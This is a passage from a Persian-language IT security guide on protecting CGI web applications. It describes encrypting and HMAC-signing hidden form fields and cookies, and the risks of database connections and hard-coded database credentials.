‫‪gRhp7ECawzUm%0AKl3Q%2BKRYhlmGILFtbde8%0A:‬‬
‫ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‪ ،‬ﻣﺘﻐﻴﺮﻫﺎﻱ ﻗﺎﺑﻞ ﻓﻬﻢ ﺳﺎﺩﻩ ﺑﺎ ﻳﻚ ﺑﻠﻮﻙ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﻧﮕﺎﺭﻱﺷﺪﻩ ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﻳـﻦ ﺑﻠـﻮﻙ ﺭﻣـﺰﻱ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺍﻟﻲ ﻣﺸﺎﺑﻪ ﺭﻭﺍﻝ ﺯﻳﺮ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ‪:‬‬
‫ﻣﺘﻐﻴﺮﻫﺎﻱ ﻣﻨﻔﺮﺩﻱ ﻛﻪ ﺑﺎﻳﺪ ﺍﺯ ﻣﻘﺪﺍﺭ ﺁﻧﻬﺎ ﺣﻔﺎﻇﺖ ﻛﺮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﻳﻚ ﺭﺷﺘﻪ ﺍﺯ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ ﻛﺪﮔـﺬﺍﺭﻱ ﻛﻨﻴـﺪ‪ .‬ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺍﺻـﻄﻼﺡ‬ ‫‪.١‬‬
‫ﻣﺮﺗﺐﻛﺮﺩﻥ‪ ٢٣٢‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻳﻚ ﺑﺮﭼﺴﺐ ‪ ۴‬ﺑﺎﻳﺘﻲ ﺑﺮﺍﻱ ﺯﻣﺎﻥ ﺍﻳﻦ ﻣﺘﻐﻴﺮﻫﺎ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻴﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷـﻤﺎ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺣﻤـﻼﺕ‬ ‫‪.٢‬‬
‫"ﺗﻜﺮﺍﺭ" ﺍﻳﻤﻦ ﺷﻮﻧﺪ‪.‬‬

‫‪232 Marshalling‬‬
‫‪٣٦٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﻓﺸﺮﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﺍﻣﺮ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻓﻀﺎﻱ ﻛﻤﺘﺮﻱ ﺍﺷﻐﺎﻝ ﮔﺮﺩﺩ‪.‬‬ ‫‪.٣‬‬
‫ﻃﻮﻝ ﺭﺷﺘﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺑﻪ ﻗﺎﻟﺐ ﺳﺎﻳﺮ ﺩﺍﺩﻩﻫﺎ ﺩﺭﺁﻭﺭﻳﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻠﻮﻙ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ‪ ،‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ‬ ‫‪.٤‬‬
‫ﻻﺯﻡ ﺍﺳﺖ‪.‬‬
‫ﺭﺷﺘﺔ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺎﺑﻊ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻭ ﻳﻚ ﻛﻠﻴﺪ ﻣﺨﻔﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫‪.٥‬‬
‫ﻳﻚ ﺗﺎﺑﻊ ﺧﻼﺻﺔ ‪ HMAC‬ﺍﺯ ﺍﻳﻦ ﺭﺷﺘﺔ ﺭﻣﺰﺷﺪﻩ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ ﻭ ﺁﻧﺮﺍ ﺑﻪ ﺭﺷﺘﺔ ﺭﻣﺰﺷﺪﻩ ﻣﺘﺼﻞ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﺧﻼﺻﺔ ‪ HMAC‬ﺑﺎﻋﺚ‬ ‫‪.٦‬‬
‫ﻣﻲﺷﻮﺩ ﺍﺯ ﻫﻤﺔ ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﺷﺪﻩ‪ ،‬ﻓﺸﺮﺩﻩﺷﺪﻩ‪ ،‬ﻭ ﻣﺮﺗﺐﺷﺪﻩ ﺣﻔﺎﻇﺖ ﺑﻌﻤﻞ ﺁﻳﺪ‪.‬‬
‫ﺭﺷﺘﺔ ﺣﺎﺻﻠﻪ ﺭﺍ ﺑﻮﺳﻴﻠﺔ ‪ Base64‬ﻛﺪﮔﺬﺍﺭﻱ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﻭ ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﻛﻨﻴﺪ ﻭ ﺭﺷﺘﺔ ﺣﺎﺻﻞ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ‪.‬‬ ‫‪.٧‬‬
‫ﺍﺯ ﺍﻳﻦ ﺭﺷﺘﺔ ﻛﺪﮔﺬﺍﺭﻱﺷﺪﺓ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﻓﺸﺮﺩﻩ ﺑﺮﺍﻱ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ‪URL ،‬ﻫﺎﻱ ﺗﺮﻛﻴﺒﻲ‪ ،‬ﻭ ‪cookie‬ﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫‪.٨‬‬
‫ﺣﺎﻝ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻭ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﺍﻳﻦ ﺭﺷﺘﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ‪ ،‬ﻛﺎﻓﻲ ﺍﺳﺖ ﮔﺎﻣﻬﺎﻱ ﺯﻳﺮ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﻴﺪ ﺗﺎ ﻋﻤﻠﻴﺎﺕ ﻗﺒﻠﻲ ﻣﻌﻜﻮﺱ ﺷﻮﺩ‪:‬‬
‫ﺭﺷﺘﻪ ﻛﺪ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﻓﺸﺮﺩﻩ ﺭﺍ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ‪URL ،‬ﻫﺎﻱ ﺗﺮﻛﻴﺒﻲ‪ ،‬ﻭ ﻳﺎ ‪cookie‬ﻫﺎ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ‪.‬‬ ‫‪.١‬‬
‫ﻛﺪﮔﺬﺍﺭﻱ ‪ Base64‬ﺭﺍ ﻳﺎﻓﺘﻪ ﻭ ﺍﺯ ﺭﺷﺘﺔ ﺍﺻﻠﻲ ﺟﺪﺍ ﺳﺎﺯﻳﺪ‪.‬‬ ‫‪.٢‬‬
‫ﺭﺷﺘﺔ ﻛﺪﺷﺪﺓ ‪ Base64‬ﺭﺍ ﻛﺪﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ‪.‬‬ ‫‪.٣‬‬
‫‪ HMAC‬ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺍﻋﺘﺒﺎﺭ ﺁﻥ ﺗﺄﻳﻴﺪ ﻧﺸﻮﺩ ﻧﺸﺎﻧﮕﺮ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺭﺷـﺘﺔ ﺑﺪﺳـﺖﺁﻣـﺪﻩ ﺩﺳـﺘﻜﺎﺭﻱ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭ‬ ‫‪.٤‬‬
‫ﺍﻳﻨﺼﻮﺭﺕ ﻳﻚ ﭘﻴﻐﺎﻡ ﺧﻄﺎ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ‪.‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫‪.٥‬‬
‫ﻃﻮﻝ ﺭﺷﺘﺔ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ ﻭ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺭﺷﺘﺔ ﺍﻭﻟﻴﻪ ﺑﺎ ﻃﻮﻝ ﺻﺤﻴﺢ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﺑـﻪ ﺍﻳـﻦ‬ ‫‪.٦‬‬
‫ﻻ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﺩﺍﺩﺓ ﻭﺭﻭﺩﻱ ﺑﺎﻳﺘﻬﺎﻱ ﺧﺎﻟﻲ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﺪ ﺗﺎ ﻃـﻮﻝ ﺁﻧـﺮﺍ ﺑـﻪ ﻳـﻚ ﻣﻘـﺪﺍﺭ‬ ‫ﺩﻟﻴﻞ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺗﺎﺑﻊ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺸﺨﺺ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﺮﺳﺎﻧﺪ‪.‬‬
‫ﺩﺍﺩﺓ ﻓﺸﺮﺩﻩﺷﺪﻩ ﺭﺍ ﺍﺯ ﻓﺸﺮﺩﮔﻲ ﺧﺎﺭﺝ ﻛﻨﻴﺪ‪.‬‬ ‫‪.٧‬‬
‫ﺑﺮﭼﺴﺐ ﺯﻣﺎﻧﻲ ﺭﺍ ﺍﺯ ﺍﺑﺘﺪﺍﻱ ﺩﺍﺩﺓ ﺑﺪﺳﺖﺁﻣﺪﻩ ﺑﺨﻮﺍﻧﻴﺪ‪ .‬ﺍﮔﺮ ﺑﺮﭼﺴﺐ ﺯﻣﺎﻧﻲ ﺧﻴﻠﻲ ﻗﺪﻳﻤﻲ ﺑﻮﺩ‪ ،‬ﺩﺍﺩﺓ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﻗﺒﻮﻝ ﻧﻜﻨﻴﺪ‪.‬‬ ‫‪.٨‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺎﻗﻴﻤﺎﻧﺪﻩ ﺭﺍ ﺑﻪ ﻓﺮﺳﺘﻨﺪﺓ ﺍﻭﻟﻴﺔ ﺩﺭﺧﻮﺍﺳﺖ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ ﺗﺎ ﻣﻘﺪﺍﺭ ﻫﻤﺔ ﻣﺘﻐﻴﺮﻫﺎﻱ ﺍﻭﻟﻴﻪ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺭﺷﺘﻪ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪.‬‬ ‫‪.٩‬‬
‫ﺍﻳﻦ ﻣﺮﺍﺣﻞ ﺑﻨﻈﺮ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﻣﺤﺎﺳﺒﺎﺕ ﺑﺴﻴﺎﺭ ﺳﻨﮕﻴﻨﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺣﻘﻴﻘﺖ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﺪﮔﺬﺍﺭﻱ ﺩﺍﺩﻩ ﺑﺴﻴﺎﺭ ﺳـﺎﺩﻩ ﺍﺳـﺖ ﻭ‬
‫ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺳـﺮﻋﺖ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﺗﻮﺍﺑـﻊ ﻛﺘﺎﺑﺨﺎﻧـﻪﺍﻱ ﺁﻣـﺎﺩﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ‪ ،‬ﻣﺎﻧﻨـﺪ‬
‫‪ CGI::EncryptForm‬ﺩﺭ ﺯﺑﺎﻥ ‪.Perl‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﺗﺼﺎﻝ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ‬


‫ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ‪ CGI‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﺪ ﺑﺎ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩﺍﻱ ﺧﺎﺭﺝ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨـﺪ‪ .‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﺓ ﺑﻴﺮﻭﻧﻲ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻣﺨﺘﻠﻔﻲ ﭼﻮﻥ ﺫﺧﻴﺮﺓ ﺗﻨﻈﻴﻤﺎﺕ ﻛﺎﺭﺑﺮ‪ ،‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺎﺭﺗﻬـﺎﻱ ﺧﺮﻳـﺪ‪ ،‬ﻭ ﺣﺘـﻲ ﭘـﺮﺩﺍﺯﺵ ﺩﺳـﺘﻮﺭﺍﺕ‬
‫ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﺪ‪ ،‬ﻳﻚ ﺍﺗﺼﺎﻝ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﺎﺯ ﻣـﻲﻛﻨـﺪ‪ ،‬ﻳـﻚ ‪ query‬ﻣـﻲﻓﺮﺳـﺘﺪ‪ ،‬ﻧﺘﻴﺠـﻪ ﺭﺍ‬
‫ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺍﺯ ﻧﺘﺎﻳﺞ ﺩﺭﻳﺎﻓﺖﺷﺪﻩ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﭘﺎﺳﺨﻲ ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺖ ﻛﺎﺭﺑﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺳﻴـﺴﺘﻤﻬﺎ‪ ،‬ﺑـﺮﺍﻱ‬
‫ﻫﺮ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﺟﺪﻳﺪ ﻛﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﺪ ﻳﻚ ﺍﺗﺼﺎﻝ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺟﺪﻳﺪ ﺳﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ ﺗﻌـﺪﺍﺩ ﻣﺤـﺪﻭﺩﻱ‬
‫ﺍﺗﺼﺎﻝ ﺩﺍﺋﻤﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﺍﺯ ﻫﻤﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﺩﺭ ﻃﺮﺍﺣﻲ ﺻﻔﺤﺎﺕ ﻭﺏ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻃﺮﺍﺡ ﺻﻔﺤﺎﺕ ﻗﺪﺭﺕ ﻋﻤﻞ ﻭ ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﭘﻴﺪﺍ ﻛﻨﺪ‪،‬‬
‫ﺍﻣﺎ ﻣﺘﺄﺳﻔﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺭﺍﻫﺒﺮﺩ ﻣﻨﺠﺮ ﺑﻪ ﻛﺎﻫﺶ ﺍﻣﻨﻴﺖ ﻛﻠﻲ ﺳﻴﺴﺘﻢ ﺷﻮﺩ؛ ﭼﺮﺍﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺿﻌﻔﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺁﻧﺠـﺎ ﻧﺎﺷـﻲ‬
‫ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻣﻬﺎﺟﻢ ﺗﻮﺍﻧﺴﺘﻪ ﻳﻚ ﺩﺳﺘﻮﺭ ﺩﻟﺨﻮﺍﻩ ‪ SQL‬ﺭﺍ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻭﺭﺩ ﻭ ﻧﺘـﺎﻳﺞ ﺁﻧـﺮﺍ ﻣـﺸﺎﻫﺪﻩ ﻛﻨـﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٧٠‬‬

‫ﭼﻨﺎﻧﭽﻪ ﺑﺮﺍﻱ ﻗﺪﺭﺗﻤﻨﺪﺗﺮ ﻛﺮﺩﻥ ﻃﺮﺍﺣﻲ ﺻﻔﺤﺎﺕ ﻭﺏ ﺧﻮﺩ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺣﺘﻤﹰﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ‬
‫ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﺎ ﺭﻋﺎﻳﺖ ﻛﻠﻴﺔ ﺟﻮﺍﻧﺐ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﻘﺮ ﺷﺪﻩﺍﻧﺪ ﻭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪.‬‬

‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬


‫ﭘﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻧﺘﺎﻳﺞ ﺭﺍ ﺑﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺭﺳﺎﻝ ﻛﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪ ﺭﺍ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﺩ ﻛﻪ ﺁﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ‪ ،‬ﻣﺠﺎﺯ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺧﻮﺍﺳﺘﻲ ﺍﺳﺖ‪ .‬ﺑﻴﺸﺘﺮ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﺑـﺮﺍﻱ ﺍﻳـﻦ‬
‫ﻣﻨﻈﻮﺭ ﺍﺯ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺍﻳﻦ ﻣﻔﻬﻮﻡ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻌﺘﺒﺮ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻩ ﺑﺎﺷﺪ ﻭ ﻫﺮﮔﺎﻩ ﻛﻪ ﺩﺭﺧﻮﺍﺳﺘﻲ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ‬
‫ﺩﺍﺭﺩ ﺁﻧﺮﺍ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﻋﺎﺩﺕ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﺩﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﺔ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺧـﻮﺩ ﻭﺍﺭﺩ‬
‫ﻛﻨﻨﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻦ ﺭﻭﺵ ﻣﺸﻜﻼﺕ ﻣﺘﻌﺪﺩﻱ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﺩ‪:‬‬
‫ﭼﻨﺎﻧﭽﻪ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﻣﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺒﻴﻨﺪ‪ ،‬ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﻧﻴﺰ ﺭﻣﺰ ﻋﺒﻮﺭ ﻓﺎﺵ ﻣﻲﺷﻮﻧﺪ؛‬ ‫•‬
‫ﺍﮔﺮ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﺨﻮﺍﻫﻨﺪ ﺍﺯ ﺁﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ ،‬ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺩﺭ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬ ‫•‬
‫ﺯﻳﺎﺩﻱ ﺫﺧﻴﺮﻩ ﺷﻮﺩ؛ ﻭ‬
‫ﺗﻐﻴﻴﺮ ﺩﺍﺩﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺴﺘﻠﺰﻡ ﺗﻐﻴﻴﺮ ﻣﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻨﺎﻇﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ ،‬ﻭ ﺩﺭ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﺗﻐﻴﻴﺮﺍﺕ ﻣﻤﻜﻦ ﺍﺳـﺖ‬ ‫•‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﻧﺎﺧﻮﺍﺳﺘﺔ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺩﺭ ﻣﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺥ ﺩﻫﺪ‪.‬‬
‫ﺑﺠﺎﻱ ﺫﺧﻴﺮﻩﻛﺮﺩﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ‪ ،‬ﻳﻚ ﺭﻭﺵ ﺑﻬﺘﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺭﻭﻱ ﻳـﻚ ﻓﺎﻳـﻞ‬
‫ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺫﺧﻴﺮﻩ ﻛﻨﻴﻢ‪ .‬ﺍﻳﻨﻜﺎﺭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺯ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﺍﻱ ﻛـﻪ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ‬
‫‪ query‬ﻣﻲﻓﺮﺳﺘﺪ ﻣﺠﺰﺍ ﺷﻮﺩ‪ ،‬ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﻭ ﻧﻴﺰ ﻗﺎﺑﻠﻴﺖ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺁﻥ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ‪ ،‬ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪ‬
